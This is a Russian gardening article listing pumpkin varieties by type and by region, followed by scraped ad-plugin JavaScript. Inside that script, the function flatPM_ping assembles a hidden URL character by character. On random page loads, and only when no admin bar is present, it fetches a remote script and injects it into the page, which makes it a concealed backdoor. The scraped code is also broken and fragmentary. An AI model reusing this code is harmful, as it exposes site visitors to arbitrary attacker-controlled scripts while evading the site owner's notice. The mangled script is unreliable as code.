  • «Медовый десерт». Плоскоокруглые плоды имеют сильный медовый аромат. Мягкая и сочная мякоть нравится всем огородникам, особенно ее любят применять для сока. Средний вес плодов может достигать 6 кг. В северных регионах «Медовый десерт» не успевает вызревать, поэтому его высаживают рассадой.
  • «Волжская серая». Овощ имеет круглую форму, дольки мало заметны, цвет корочки – серый, толщина мякоти 5 см, плоды при должном уходе вырастают до 25 кг.
  • «Сладкая зимняя». Растение относится к среднепоздним сортам. Плоды созревают на 150 день после посадки. Форма овощей круглая и слегка приплюснутая. Заметно сформированы дольки. Корочка твердая, оттенок у нее темно-серый. Мягкая и нежная мякоть этого сорта тыквы позволяет получать вкусный сок.
  • «Желтый центнер». Очень сладкий сорт, плоды на хорошем грунте вырастают до 200 кг. Форма – круглая, по краям уплощенная. Количество содержания сахара у этого сорта рекордно большое. Высаживать тыкву можно рассадой или сразу в грунт. Созревает «Желтый центнер» на протяжении 100 дней, хранится полгода.
  • «Грибовский». Это зимний твердокорый кустовой сорт. Форма у тыквы этого сорта овальная, вес доходить может до 5 кг, цвет кожицы – серый, сахаристость мякоти составляет 12%, созревание наблюдается на протяжении 100 дней.
  • «Парижская золотая». Среднеспелому засухоустойчивому гибриду свойственен сладкий вкус с тонким ароматом. Поэтому он часто используется в детском питании.

СОРТА МУСКАТНОЙ ТЫКВЫ

Важными особенностями данного вида является продолжительный срок хранения, тонкая кожура, наличие большого количества микроэлементов и витамин. Мускатные сорта тыквы относятся к теплолюбивым растениям, поэтому выращиваются, как правило, в южных областях страны.

Рассмотрим популярные сорта:

  • «Жемчужина». Этот среднеспелый сорт цилиндрической формы обладает сочной и ароматной мякотью. Растение дает отменный урожай при влажности до 70% и прогреве воздуха до 20⁰С.
  • «Прованская». Созревание среднепоздних плодов данного сорта длится около 120 дней после высадки. Округлые плоды с ярко выраженными дольками слегка приплюснуты. Вес они набирают до 4 кг (на сильно удобренной почве вес сорта может доходить до 7 кг). Из сочной, ароматной мякоти огородники делают отличный сок и пюре.
  • «Витаминная». Сорт позднеспелый, созревание наступает через 4,5 месяца после высадки. Спелые плоды имеют овальную форму, ребра у них слабо заметные, вес доходит до 5 кг, цвет кожуры бурый, могут просматриваться желто-зеленые вкрапления. Оранжевая мякоть у сорта сочная с высоким показателем сладости. Хранение не требует особых условий.
  • «Гитара». Созревание среднеспелого сорта происходит на протяжении 120 дней. Форма – вытянутая, мякоть нежная, ароматная. Спелые овощи весят до 8 кг, средняя длина составляет 70 см (при хорошем удобрении почвы овощи этого сорта вырастают до 1 метра).

СОРТА КУСТОВОЙ ТЫКВЫ

Главным преимущественным отличием кустовой тыквы является компактное формирование куста и быстрое созревание.

Рассмотрим несколько самых популярных сортов:

  • «Оранжевая». Данный сорт является гордостью селекционеров России. Растению характерны неприхотливость в разных климатических условиях (выращивается овощ этого сорта в разных регионах страны), короткий срок созревания, равный 110 дням, тонкая кожица, крупные сочные плоды весом 6 кг. Все эти показатели делают сорт широко востребованным и пригодным к универсальному применению.
  • «Стофунтовая». Среднепозднему сорту характерны достаточно большие, круглые плоды, представленные в оранжевом оттенке. Мякоть рыхлая и слабосладкая.
  • «Амазонка». Созревание овоща приходится на 110 день после посадки, вес тыквы этого сорта может доходить до 2 кг. Тыкве свойственна округлая, приплюснутая форма, десертный вкус и продолжительный срок сохранности. Благодаря этим качествам сорт пользуется высоким спросом.

СОРТА ТЫКВЫ ДЛЯ ОТКРЫТОГО ГРУНТА

Сорта тыквы для высадки в открытый грунт подбираются с учетом климата. Так, теплолюбивые культуры стоит высаживать в южных регионах. Там, где лето короткое и холодное, выбираются скороспелые, морозоустойчивые сорта.

Например, мускатным сортам характерна устойчивость к жаре. Поэтому их высаживают в южных областях России. Крупноплодным растениям требуется много времени для вызревания, поэтому их также предпочтительно высаживать на юге страны. Твердокорые плоды относятся к самым скороспелым и устойчивым к перепадам температур сортам. Этот фактор позволяет высаживать их в холодных регионах.

Выбирая сорт тыквы для Сибири и Урала, эксперты рекомендуют учитывать факт появления заморозков в этих широтах даже в июне. Поэтому советуют использовать такие холодостойкие сорта, как «Россиянка», «Веснушка» и «Улыбка».

В Северо-Западных областях России прохладный и сырой климат вынуждает садоводов выбирать такие скороспелые, твердокорые урожайные сорта тыквы, как «Кустовая оранжевая», «Крошка», «Прикорневая», «Акорн».

Огородникам, проживающим в Центральной России, рекомендуется отдавать преимущество твердокорым сортам с ранним/средним сроком вызревания и высокой урожайностью. К ним можно отнести тыкву «Дачная», «Грибовская кустовая 189», «Веснушка», «Премьера», «Сладкий пирог», «Лечебная».

В южных регионах России стоит высаживать теплолюбивую мускатную тыкву. В прохладных районах этот вид высаживается в грунт только летом.

СОРТА ТЫКВЫ ДЛЯ СЕМЕЧЕК

Бизнес на выращивании тыквы для сбора семечек сегодня получает все большую популярность. Благодаря большому содержанию в семенном материале витамин и полезных микроэлементов, его используют для переработки на масло.

Для получения семечек производители отдают предпочтение таким крупноплодным сортам, как:

  • «Волжская серая 92» (размер семян средний);
  • «Стофунтовая» (сорт с крупными семечками);
  • «Болгарка» (семена средние);
  • «Данка-Польская» (семена средние);

Много семечек дают и Голосеменные сорта («Голосемянка», «Даная», «Юнона», зерна у которых среднего размера).

ЛУЧШИЕ СОРТА ПО РЕГИОНАМ

Практический опыт садоводов говорит, что наилучшие результаты по выращиванию тыквы на территории России дают отечественные сорта.

Самыми лучшими считаются для Подмосковья такие сорта, как:

  1. «Целебная». Относится к ранним сортам (период от посадки до созревания длится 94 дня), тыква проявляет устойчивость к холоду и засухе. Приятные на вкус плоды способны набрать вес до 3 кг, хранятся они до 6 месяцев.
  2. «Лечебная». Это раннеспелый сорт (период созревания 90 дней). Плоды имеют вес до 5 кг. Данному сорту характерны сочность, великолепный вкус и аромат.

Также для Подмосковья и для средней полосы России селекционеры рекомендуют выращивать тыкву «Сладкий пирог», «Цукат», «Премьера», «Грибовская кустовая 189», «Дачная».

Лучшие варианты для Сибири и для Урала:

  1. «Улыбка». Созревание плодов наблюдается через 3 месяца после посадки. Растение относится к кустовому сорту и обеспечивает высокие урожаи.
  2. «Веснушка». Проявляет устойчивость к температурным скачкам. Плоды могут иметь вес до 3 кг, сладкая их мякоть напоминает вкус дыни.
  3. «Россиянка». Этот морозоустойчивый сорт выведен специально для выращивания в Сибири. Ему характерен высокий иммунитет к болезням и хорошая урожайность. По вкусовым качествам плоды напоминают дыню.

Для Ленинградской области специалисты советуют выбирать для посадки сорта «Кустовая оранжевая», «Кустовая» и «Прикорневая». Им характерны высокая урожайность, скороспелость, хорошая сохранность и отличные вкусовые качества.

ИТОГИ

Данный материал посвящен сортам тыквы. Теперь вы сможете подобрать наиболее подходящий для своего региона сорт овоща. Выращивайте тыкву правильно и пусть она всегда радует хорошим урожаем!

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};